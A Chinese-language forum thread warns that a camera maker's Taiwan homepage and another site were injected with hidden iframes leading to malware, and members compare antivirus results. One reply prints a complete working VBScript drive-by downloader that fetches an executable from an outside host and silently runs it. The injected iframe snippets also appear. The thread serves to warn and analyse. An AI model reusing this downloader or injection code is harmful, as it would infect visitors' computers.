作者 主題: [警告]知名企業遭到大陸駭客在網頁放置病毒連結。  (閱讀 17258 次)

0 會員 與 1 訪客 正在閱讀本文。

日京三子

  • 全區板主
  • 俺是博士!
  • *****
  • 文章數: 8832
    • 檢視個人資料
    • http://www.24online.cjb.net
剛剛在「nikon.com.tw」首頁,發現這段程式:
代碼: [選擇]
<iframe src=http://www.loveff.cn/wuxin/gh.htm height=1></iframe>

經過輾轉之後,瀏覽器會取得這個遊戲木馬程式:
代碼: [選擇]
<iframe src="http://youyou250.go2.icpcn.com/07/gz.htm
" name="zhu" width="0" height="0"  frameborder="0"></iframe>


根據不入流測試報告,該病毒網頁,能在瀏覽器載入的第一時間發現與提出警告的(順便停止載入該網頁),有K牌、B牌,還有不用錢的avast,兩個N跟PC陣亡。

使用萬能無敵的wget取得,沒事。:lol:  :lol:  :lol:


報告完畢,謝謝收看。
哈克不愛的多合一輸入平台----->新香草口味
過去的時間不斷流逝,抹去的眼淚已成追憶;
乾枯的雙手無力阻止,再會了我遠去的曾經。

JackYang78

  • 榮譽博士
  • 俺是博士!
  • *****
  • 文章數: 2672
    • 檢視個人資料
收到..觀賞完畢!!
Networking & Communication Security SE

phantom

  • SA 苦力組
  • 俺是博士!
  • *****
  • 文章數: 2185
    • 檢視個人資料
這... 應該不是第一次了。
好在我都不去那。
Linux 非萬能, 沒 Linux 萬萬不能.
root = God
apt-get install ultimate-horsepower

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
引述: "日京三子"
剛剛在「nikon.com.tw」首頁,發現這段程式:
代碼: [選擇]
<iframe src=http://www.loveff.cn/wuxin/gh.htm height=1></iframe>

經過輾轉之後,瀏覽器會取得這個遊戲木馬程式:
代碼: [選擇]
<iframe src="http://youyou250.go2.icpcn.com/07/gz.htm
" name="zhu" width="0" height="0"  frameborder="0"></iframe>


根據不入流測試報告,該病毒網頁,能在瀏覽器載入的第一時間發現與提出警告的(順便停止載入該網頁),有K牌、B牌,還有不用錢的avast,兩個N跟PC陣亡。

使用萬能無敵的wget取得,沒事。:lol:  :lol:  :lol:


報告完畢,謝謝收看。


小紅傘有沒有擋到?
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/

日京三子

  • 全區板主
  • 俺是博士!
  • *****
  • 文章數: 8832
    • 檢視個人資料
    • http://www.24online.cjb.net
引述: "Darkhero"
小紅傘有沒有擋到?
「雨傘」我公司沒有,要回家才能測^^
哈克不愛的多合一輸入平台----->新香草口味
過去的時間不斷流逝,抹去的眼淚已成追憶;
乾枯的雙手無力阻止,再會了我遠去的曾經。

hoyo

  • 榮譽博士
  • 俺是博士!
  • *****
  • 文章數: 4053
  • 性別: 男
  • 有需要的時候,學習就不會分階段。
    • 檢視個人資料
    • 樂咖黑電腦學習網
引述: "Darkhero"
小紅傘有沒有擋到?


可以,如果使用 ie 開啟的話,

不過使用 firefox 就完全沒事,因為那是 vbscript 的病毒,

病毒名稱:VBS/Dldr.Agent.6171
受人與魚,不如授人與漁
上海自來水來自海上;倫敦好奇人奇好敦倫

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
引述: "hoyo"
引述: "Darkhero"
小紅傘有沒有擋到?


可以,如果使用 ie 開啟的話,

不過使用 firefox 就完全沒事,因為那是 vbscript 的病毒,

病毒名稱:VBS/Dldr.Agent.6171


果然是萬惡的 vbscript ...
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/

hoyo

  • 榮譽博士
  • 俺是博士!
  • *****
  • 文章數: 4053
  • 性別: 男
  • 有需要的時候,學習就不會分階段。
    • 檢視個人資料
    • 樂咖黑電腦學習網
引述: "Darkhero"
引述: "hoyo"
引述: "Darkhero"
小紅傘有沒有擋到?


可以,如果使用 ie 開啟的話,

不過使用 firefox 就完全沒事,因為那是 vbscript 的病毒,

病毒名稱:VBS/Dldr.Agent.6171


果然是萬惡的 vbscript ...


以下程式碼由 php 翻譯而成,請勿直接複製到電腦,新增 .vbs 檔 貼上後執行,謝謝!

代碼: [選擇]
on error resume next
MyQQ5372453="http://youyou250.go2.icpcn.com/07/kabakao.exe"
Set CAOc = document.createElement("object")
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, MyQQ5372453, False
CAOd.Send
CAO9="gz002.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0
受人與魚,不如授人與漁
上海自來水來自海上;倫敦好奇人奇好敦倫

日京三子

  • 全區板主
  • 俺是博士!
  • *****
  • 文章數: 8832
    • 檢視個人資料
    • http://www.24online.cjb.net

滿公正的檢測報告,關於那個網頁病毒^^  :wink:
哈克不愛的多合一輸入平台----->新香草口味
過去的時間不斷流逝,抹去的眼淚已成追憶;
乾枯的雙手無力阻止,再會了我遠去的曾經。

QoQOoO

  • 活潑的大學生
  • ***
  • 文章數: 403
    • 檢視個人資料
基本上這個還好! 旅遊業的更是常常被放一堆亂七八糟的東西!

只因為他們都購買某一家的產品,那家的產品又有SQL Injection....

連我都可以進入..那不知道那些功力高強的人可以做些甚麼事了!

所以留個人資料要謹慎啊! 8)

日京三子

  • 全區板主
  • 俺是博士!
  • *****
  • 文章數: 8832
    • 檢視個人資料
    • http://www.24online.cjb.net
加上一個,剛剛有人通報給我的:


http://406club.dyndns.org/camera/

裡面被連結到:

http://pynet.info/col/index.php


下載回來的病毒程式:
代碼: [選擇]
Virus scanning report  -  30 March 2007 @ 14:34

F-PROT ANTIVIRUS
Program version: 4.6.6
Engine version: 3.16.14

VIRUS SIGNATURE FILES
SIGN.DEF created 29 March 2007
SIGN2.DEF created 29 March 2007
MACRO.DEF created 29 March 2007

Search: ./virus.exe
Action: Report only
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER

/tmp/1/virus.exe->(FSG)  Infection: Possibly a new variant of W32/new-malware!Maximus



看樣子大陸駭客大舉入侵的結果,真是歡樂。
哈克不愛的多合一輸入平台----->新香草口味
過去的時間不斷流逝,抹去的眼淚已成追憶;
乾枯的雙手無力阻止,再會了我遠去的曾經。

kevin_boy

  • 憂鬱的高中生
  • ***
  • 文章數: 185
    • 檢視個人資料
還真多耶.....真可怕
幸好我都用Firefox

梁楓

  • 俺是博士!
  • *****
  • 文章數: 6220
    • 檢視個人資料
其實... 這種被植入惡意程式碼的事,非常,非常的常見

我當初寫偵測系統,有很大的因素是為了第一時間知道自己有沒有中獎才寫出來的

呵呵